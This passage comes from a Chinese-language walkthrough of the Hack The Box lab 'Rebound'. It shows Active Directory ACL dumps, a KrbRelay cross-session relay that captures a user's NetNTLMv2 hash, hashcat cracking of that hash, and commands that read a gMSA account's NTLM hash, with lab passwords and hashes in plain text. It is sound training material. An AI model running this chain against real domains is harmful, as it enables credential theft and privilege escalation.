ObjectDN : CN=Domain Controllers,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-516
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Schema Admins,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-518
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Enterprise Admins,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-519
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Domain Admins,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-512
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Server Operators,CN=Builtin,DC=rebound,DC=htb
ObjectSID : S-1-5-32-549
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Account Operators,CN=Builtin,DC=rebound,DC=htb
ObjectSID : S-1-5-32-548
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=S-1-5-9,CN=ForeignSecurityPrincipals,DC=rebound,DC=htb
ObjectSID : S-1-5-9
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Read-only Domain Controllers,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-521
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Key Admins,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-526
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Enterprise Key Admins,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-527
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=@,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=m.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=j.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=c.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=h.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=f.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=e.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=g.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=d.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=l.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=b.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=i.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=a.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=k.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=ppaul,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-1951
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessDenied
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessDeniedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=llune,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-2952
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessDenied
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessDeniedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=fflock,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-3382
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessDenied
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessDeniedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=jjones,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-5277
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessDenied
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessDeniedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=mmalone,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-5569
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessDenied
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessDeniedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=nnoon,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-5680
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessDenied
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessDeniedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=ldap_monitor,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7681
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessDenied
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessDeniedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=oorend,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7682
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessDenied
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessDeniedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7684
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessDenied
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessDeniedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=batch_runner,OU=Service Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7685
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessDenied
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessDeniedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=tbrady,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7686
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessDenied
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessDeniedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7687
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : 00299570-246d-11d0-a768-00aa006e0529
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessDenied
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessDeniedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7687
ActiveDirectoryRights : ReadProperty
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : e362ed86-b728-0842-b27d-2dea7a9df218
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 16
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

通过管道过滤结果,仅保留 ACE 中 SecurityIdentifier 属性等于 S-1-1-0 的条目。S-1-1-0 是 Everyone 组的通用 SID,表示所有用户(包括匿名用户)

加上-ResolveGUIDs 转换下属性。并且筛选一下 delegator 的 DN 再筛选一次:CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb

-ResolveGUIDs 的作用 该参数会查询域控的 Extended-Rights 容器,将 GUID 转换为易读的权限名称或属性描述。例如,上述 GUID 会被解析为 msDS-AllowedToActOnBehalfOfOtherIdentity(约束委派权限)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
*Evil-WinRM* PS C:\Users\winrm_svc> get-domainobjectacl -ResolveGUIDs | where-object { $_.SecurityIdentifier -eq "S-1-1-0" -and $_.ObjectDN -match "CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb" }


AceQualifier : AccessDenied
ObjectDN : CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
ActiveDirectoryRights : ExtendedRight
ObjectAceType : User-Force-Change-Password
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7687
InheritanceFlags : None
BinaryLength : 40
AceType : AccessDeniedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-1-0
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
ActiveDirectoryRights : ReadProperty
ObjectAceType : ms-DS-ManagedPassword
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7687
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-1-0
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

第二条比较有用,所有人可读取 gMSA (组托管服务)密码: 此规则允许任何用户(包括匿名用户)读取 delegator 的 gMSA 密码。

KrbRelay

GitHub - cube0x0/KrbRelay: Framework for Kerberos relaying

首先用 VS 给他 build 一个 release 出来。

编译完了上传。

1
upload /root/htb/Rebound/KrbRelay.exe

先看下操作系统版本。systeminfo 会报错,那就用 PowerView 尝试一下。

1
2
*Evil-WinRM* PS C:\Users\winrm_svc> get-computerinfo | findstr "WindowsProductName"
WindowsProductName : Windows Server 2019 Standard

发现是 2019 版本,还用 RunasCs 执行。(如果不联网,指定给 RunasCs 的账号密码可以不用正确,但是一旦联网就不行)这里已经捕获到了 tbrady 的 hash。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
*Evil-WinRM* PS C:\Users\winrm_svc> .\RunasCs.exe oorend '1GR8t@$$4u' -l 9 '.\KrbRelay.exe -session 1 -clsid 38e441fb-3d16-422f-8750-b2dacec5cefc -ntlm'

[*] Auth Context: rebound\tbrady
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\winrm_svc\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAADJ8EYmRD5XvCbYsawwC+0xAkAAAMAR///WWbduB93mnyIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing cross-session authentication
[*] Using CLSID: 38e441fb-3d16-422f-8750-b2dacec5cefc
[*] Spawning in session 1
[*] NTLM1
4e544c4d535350000100000097b208e2070007002c00000004000400280000000a0063450000000f444330315245424f554e44
[*] NTLM2
4e544c4d53535000020000000e000e003800000015c289e28463988f28bd04e7000000000000000086008600460000000a0063450000000f7200650062006f0075006e00640002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e00680074006200070008003054408876a5db0100000000000000000000000074002e00570069006e0064006f00770068502e4b0b010000
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, ReplayDetect, SequenceDetect, UseDceStyle, Connection, AllowNonUserLogons
[*] NTLM3
tbrady::rebound:8463988f28bd04e7:01610cb29e4e940afbd48a90f95daac7:01010000000000003054408876a5db013feb48b73886bc700000000002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e00680074006200070008003054408876a5db0106000400060000000800300030000000000000000100000000200000695cc7beab1cbcd7021f230899217e626a55e6c32b496182c7e68404eb1966020a00100000000000000000000000000000000000090000000000000000000000
System.UnauthorizedAccessException: Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
at KrbRelay.IStandardActivator.StandardGetInstanceFromIStorage(COSERVERINFO pServerInfo, Guid& pclsidOverride, IntPtr punkOuter, CLSCTX dwClsCtx, IStorage pstg, Int32 dwCount, MULTI_QI[] pResults)
at KrbRelay.Program.Main(String[] args)

hashcat 一把 🔒

1
hashcat -m 5600 'tbrady::rebound:8463988f28bd04e7:01610cb29e4e940afbd48a90f95daac7:01010000000000003054408876a5db013feb48b73886bc700000000002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e00680074006200070008003054408876a5db0106000400060000000800300030000000000000000100000000200000695cc7beab1cbcd7021f230899217e626a55e6c32b496182c7e68404eb1966020a00100000000000000000000000000000000000090000000000000000000000' /usr/share/wordlists/rockyou.txt

找到了密码:tbrady:543BOMBOMBUNmanda

kerberos 同步前先申请票据。

1
2
3
4
5
6
7
ntpdate rebound.htb


getTGT.py -dc-ip 10.10.11.231 rebound.htb/tbrady:543BOMBOMBUNmanda
Impacket v0.13.0.dev0+20250401.172759.352695f1 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in tbrady.ccache

导入变量。export KRB5CCNAME=tbrady.ccache

先看下票据能不能用,发现确实能用。(当然也可以直接传入账号密码,不申请票据来获取这个 gmsa 密码)

1
2
3
4
┌──(root㉿escorpion)-[~/htb/Rebound]
└─# nxc ldap rebound.htb -d rebound.htb --use-kcache
SMB rebound.htb 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAPS rebound.htb 636 DC01 [+] rebound.htb\tbrady

然后根据 ACL 读取 gmsa 的密码。

1
2
3
4
5
6
┌──(root㉿escorpion)-[~/htb/Rebound]
└─# nxc ldap rebound.htb -d rebound.htb --use-kcache --gmsa
SMB rebound.htb 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAPS rebound.htb 636 DC01 [+] rebound.htb\tbrady from ccache
LDAPS rebound.htb 636 DC01 [*] Getting GMSA Passwords
LDAPS rebound.htb 636 DC01 Account: delegator$ NTLM: d0700a7a8e202cbad887ebf92e4d1080

delegator$:d0700a7a8e202cbad887ebf92e4d1080

当然也可以用 bloodyAD 去获取 delegator$ 的 Hash

1
2
3
4
5
6
┌──(root㉿escorpion)-[~]
└─# bloodyAD -d rebound.htb -u tbrady -p '543BOMBOMBUNmanda' --host dc01.rebound.htb get object 'delegator$' --resolve-sd --attr msDS-ManagedPassword

distinguishedName: CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:d0700a7a8e202cbad887ebf92e4d1080
msDS-ManagedPassword.B64ENCODED: MWi3XbICc9h6/Ln650H9COO5/84q/8lrbQbKFbkZytFOcMdxkROZMsb4bAdoOI2aOZ6cAQX+O69B147bt6B5pINcVQxDyAO4P8Ltj9uP5ex+vQBP1MI2EqeAMIJtWNj3p0W9o8HbwcmkKICZWkyuDC51xbcB+ESLTKtUUbzZ4JiCk+F3d0I/FUAoZXHNDPYXTfvIIBZlnPUNj4tvj9AgXpJd2AF6JyEPsefiEEU2R+dfjjxGPAer0HBADFuVk8Zg2TWhAaxBa3d/IhNuZJw3k935+KhjEIjxYb4qc+/NFvI56kOZFmt2DUjYJ0bz3x8AUlzMNi+4oGUCC5v5MMdwHg==

gMSA 利用

重新连接 powerview,这里为了补全就直接用 powerview 了。

1
get-domainobjectacl -ResolveGUIDs | where-object { $_.SecurityIdentifier -eq "S-1-1-0" -and $_.ObjectDN -match "CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb" }

然后就是委派。

非约束委派允许服务账户获取用户的 TGT 并模拟其访问任意服务,权限开放但风险极高;约束委派通过限制服务账户只能访问预先指定的目标服务(如 LDAP、CIFS),在灵活性中平衡安全性;基于资源的约束委派则由资源方自主控制哪些账户可以委派访问自己,无需域管理员介入,实现了权限控制的去中心化和精细化,成为现代 Active Directory 环境中的推荐方案。

虽然 bloodhound 没有显示委派,但是可以用 impacket 中的 findDelegation.py 查找委派。

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿escorpion)-[~]
└─# findDelegation.py rebound.htb/oorend:'1GR8t@$$4u' -dc-ip dc01.rebound.htb -k
